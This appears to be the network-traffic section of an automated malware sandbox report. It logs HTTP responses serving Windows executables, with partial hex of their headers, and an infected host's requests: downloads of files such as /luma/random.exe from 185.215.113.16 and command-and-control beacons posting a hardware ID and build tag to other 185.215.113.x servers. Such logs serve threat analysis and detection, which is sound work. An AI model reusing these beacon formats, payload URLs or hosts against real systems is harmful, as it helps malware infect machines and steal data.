Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:56 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:52:55 GMTContent-Type: application/octet-streamContent-Length: 1925632Last-Modified: Wed, 23 Oct 2024 15:37:20 GMTConnection: keep-aliveETag: "67191830-1d6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 5c be 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 37 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 36 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6f 69 6f 79 7a 67 74 00 50 1a 00 00 f0 31 00 00 48 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 61 63 6a 64 71 69 75 00 10 00 00 00 40 4c 00 00 04 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:52:57 GMTContent-Type: application/octet-streamContent-Length: 1833984Last-Modified: Wed, 23 Oct 2024 15:37:13 GMTConnection: keep-aliveETag: "67191829-1bfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 d1 e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 61 64 67 76 74 6a 71 00 a0 19 00 00 a0 4f 00 00 9a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 76 71 6a 6f 71 6d 00 10 00 00 00 40 69 00 00 04 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:52:59 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Wed, 23 Oct 2024 15:44:06 GMTConnection: keep-aliveETag: "671919c6-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 de 72 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7a 73 64 6a 77 61 6c 69 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 72 6e 6d 63 78 63 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="build"doma------IIJEBAECGCBKECAAAEBF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000992001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000993001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="build"doma------EBAEBFIIECBGCBGDHCAF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000994001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 2d 2d 0d 0a Data Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="build"doma------BAAFBFBAAKECFIEBFIEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000995001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="build"doma------JJJKFBAAAFHJEBFIEGID--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
